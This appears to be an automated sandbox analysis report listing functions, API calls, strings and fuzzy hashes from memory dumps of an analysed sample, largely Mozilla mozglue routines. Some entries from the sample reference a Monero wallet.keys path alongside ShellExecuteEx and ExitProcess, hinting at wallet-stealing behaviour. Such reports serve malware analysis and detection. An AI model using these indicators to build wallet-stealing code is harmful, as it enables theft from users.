Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: 7450040c3f427356f7dcb40d215499aa0570cf6745adfdbf1ea8610fba67f6a8
Instruction ID: 11cab3483047ab661584c51e2c6e4b7a2df9d131b4d44b78891cf9595a6ea397
Opcode Fuzzy Hash: 7450040c3f427356f7dcb40d215499aa0570cf6745adfdbf1ea8610fba67f6a8
Instruction Fuzzy Hash: 8D3141B1A003159FDB10DF798C45AABB7F8EF49615F15442DE84AD7740E734E805CBA8

Function 6C5BB4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C5BB532
moz_xmalloc.MOZGLUE(?), ref: 6C5BB55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5BB56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C5BB57E
free.MOZGLUE(00000000), ref: 6C5BB58F

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 31a8a22172c01b73066e5d3a3fa14ff200ba3bfb8c1be2532824e36aaa771f70
Instruction ID: 1cc254a47eed5bc195d06dda36d41803fdfe2f9af3653d6ff7a98d285d60657f
Opcode Fuzzy Hash: 31a8a22172c01b73066e5d3a3fa14ff200ba3bfb8c1be2532824e36aaa771f70
Instruction Fuzzy Hash: A121D871A002059BDB00DF69CD90B6ABFB9FF86314F244129E918DB392F775D911C7A2

Function 00269260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(00D4E188,?,?,?,0026140C,?,00D4E188,00000000), ref: 0026926C
lstrcpyn.KERNEL32(0049AB88,00D4E188,00D4E188,?,0026140C,?,00D4E188), ref: 00269290
lstrlen.KERNEL32(?,?,0026140C,?,00D4E188), ref: 002692A7
wsprintfA.USER32 ref: 002692C7

Strings

%s%s, xrefs: 002692B5

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 4e3c6081617772aedbad8822321a5e673edc5e90de0f9147eab1a13cf7c2e39c
Instruction ID: 559b75303d78c075e213c8f99c8abc4275e6acb7a449426288f55d1f787f8d6f
Opcode Fuzzy Hash: 4e3c6081617772aedbad8822321a5e673edc5e90de0f9147eab1a13cf7c2e39c
Instruction Fuzzy Hash: 3A011E75500108FFCB04DFECC998EAE7BB9EB44350F108169F9098B200C635EA60DBD6

Function 6C5F0D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C5B3DEF), ref: 6C5F0D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C5B3DEF), ref: 6C5F0D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C5B3DEF), ref: 6C5F0DAF

Strings

<jemalloc>, xrefs: 6C5F0D92, 6C5F0DB9
: (malloc) Error in VirtualFree(), xrefs: 6C5F0D97, 6C5F0DBE

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: c75aded7f46eb737d4bd5f5351d1ccbc045768753d753961aaf9f6b16bf3bb5f
Instruction ID: 09cdb5f8546b32f9e22957d18d5e158adf038ec8e3334be912a21bb0c8983bda
Opcode Fuzzy Hash: c75aded7f46eb737d4bd5f5351d1ccbc045768753d753961aaf9f6b16bf3bb5f
Instruction Fuzzy Hash: F6F0E0313806A823E62815660C05B67265E67C1B15F387037F66CDE9C0DAA0E4068EBD

Function 6C5DD468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C5ECBE8: GetCurrentProcess.KERNEL32(?,6C5B31A7), ref: 6C5ECBF1
Part of subcall function 6C5ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5B31A7), ref: 6C5ECBFA

EnterCriticalSection.KERNEL32(6C63E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5ED1C5), ref: 6C5DD4F2
LeaveCriticalSection.KERNEL32(6C63E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5ED1C5), ref: 6C5DD50B

Part of subcall function 6C5BCFE0: EnterCriticalSection.KERNEL32(6C63E784), ref: 6C5BCFF6
Part of subcall function 6C5BCFE0: LeaveCriticalSection.KERNEL32(6C63E784), ref: 6C5BD026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5ED1C5), ref: 6C5DD52E
EnterCriticalSection.KERNEL32(6C63E7DC), ref: 6C5DD690
LeaveCriticalSection.KERNEL32(6C63E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5ED1C5), ref: 6C5DD751

Strings

MOZ_CRASH(), xrefs: 6C5DD4BB

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 5d7726f3397b7b4aafb7ff2af9481fad863325806c18fc64f7cd8d9d128867a8
Instruction ID: a02a671c24a07d949bb7f3b319e38a0552ece708011322dcfc0827162a134937
Opcode Fuzzy Hash: 5d7726f3397b7b4aafb7ff2af9481fad863325806c18fc64f7cd8d9d128867a8
Instruction Fuzzy Hash: 0551F171A047018FD368CF29C89471ABBF1EB89704F15592EE999C7B85D730E800CFA6

Function 0026C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtGetStringTypeA.LIBCMT ref: 0026C8EC
___crtLCMapStringA.LIBCMT ref: 0026C90C
___crtLCMapStringA.LIBCMT ref: 0026C931

Strings

, xrefs: 0026C896

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Type
String ID:
API String ID: 2109742289-3916222277
Opcode ID: 1c817730c8c52de87d4ad9d69ada148c093c96c7cb591be7c7f56d445858d6c8
Instruction ID: d86aeb9466ec34b43a901f786c1bad213322d16132be2f2a3626558171e20c11
Opcode Fuzzy Hash: 1c817730c8c52de87d4ad9d69ada148c093c96c7cb591be7c7f56d445858d6c8
Instruction Fuzzy Hash: 7E41D57151179C9EDB229B24CC84BFBBBEC9B45704F2444E8E9CA87182D2719A94DF60

Function 6C60B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5B4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C5F3EBD,6C5F3EBD,00000000), ref: 6C5B42A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C60B127), ref: 6C60B463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C60B4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C60B4E4

Strings

pid:, xrefs: 6C60B4DE

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 0ba99a845d6f9001eea3bbbb8e69c95dfe5b6287e331dcfb04430d32d21f5099
Instruction ID: abda57e65c929fc3c0f04907d7916933533d4600b092d803650ef70ef637d44f
Opcode Fuzzy Hash: 0ba99a845d6f9001eea3bbbb8e69c95dfe5b6287e331dcfb04430d32d21f5099
Instruction Fuzzy Hash: 79313331B01209DBCB14DFA9D980AEEB7B5FF89308F544529D80277A41D731AA49CBE9

Function 00266630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00266663

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

ShellExecuteEx.SHELL32(0000003C), ref: 00266726
ExitProcess.KERNEL32 ref: 00266755

Strings

<, xrefs: 002666D9

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: c5c2340a488c8d86a10e0ba58c20e9369580f9497b53b21e79b08ef5bc9a7de4
Instruction ID: e0c25a40a40c65803f023b5f9d81d796e378911b455aec19ab5cce0181a952fb
Opcode Fuzzy Hash: c5c2340a488c8d86a10e0ba58c20e9369580f9497b53b21e79b08ef5bc9a7de4
Instruction Fuzzy Hash: 6F312DB1911218AADB14EB90DC96BDEB778AF14300F4041A9F20976191DF746B98CF9A

Function 002687C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00270E28,00000000,?), ref: 0026882F
RtlAllocateHeap.NTDLL(00000000), ref: 00268836
wsprintfA.USER32 ref: 00268850

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Strings

%dx%d, xrefs: 00268847

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: ef67eebfbf4aaf4ffd7d2e8de68bf98b3d4ae2a754bc2a6d6d61849f983ecf3c
Instruction ID: 2fc67dd8b8ad95a9b700813ece187e658ff857ba2e2c01e1bec0cca49fab9cda
Opcode Fuzzy Hash: ef67eebfbf4aaf4ffd7d2e8de68bf98b3d4ae2a754bc2a6d6d61849f983ecf3c
Instruction Fuzzy Hash: 27214FB1E50208AFDB04DFD4DD49FAEBBB8FB48701F10416AF605A7280C779A910CBA5

Function 6C5FE550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C5FE577
AcquireSRWLockExclusive.KERNEL32(6C63F4B8), ref: 6C5FE584
ReleaseSRWLockExclusive.KERNEL32(6C63F4B8), ref: 6C5FE5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C5FE8A6

Strings

MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C5FE722, 6C5FE750, 6C5FE7A2
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C5FE655
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C5FE826, 6C5FE850
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C5FE777
MOZ_PROFILER_STARTUP, xrefs: 6C5FE5A1, 6C5FE5CC, 6C5FE5FF, 6C5FE62A

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: aa69accfd43082eb7b8f2231859cff34f18b8047bdbb3ba7a65db2f288923f86
Instruction ID: 03f8a14340fffa59eccc646f2a2552395a30d261947dfd52357a8d6907c9c1be
Opcode Fuzzy Hash: aa69accfd43082eb7b8f2231859cff34f18b8047bdbb3ba7a65db2f288923f86
Instruction Fuzzy Hash: 8311A131604668DFCB109F1AC889A6DBBF4FFC9728F002559F89947652C7B0A805CF9A

Function 00268D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0026951E,00000000), ref: 00268D5B
RtlAllocateHeap.NTDLL(00000000), ref: 00268D62
wsprintfW.USER32 ref: 00268D78

Strings

%hs, xrefs: 00268D6F

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: 918ea48e9a1f1997708a551609225ac18c0483e34b5598a7f9159431e2dcb2c9
Instruction ID: 2a879d4423aa51f50b917ae3debfced0bc2fb1228f85af3c847117d0595064d8
Opcode Fuzzy Hash: 918ea48e9a1f1997708a551609225ac18c0483e34b5598a7f9159431e2dcb2c9
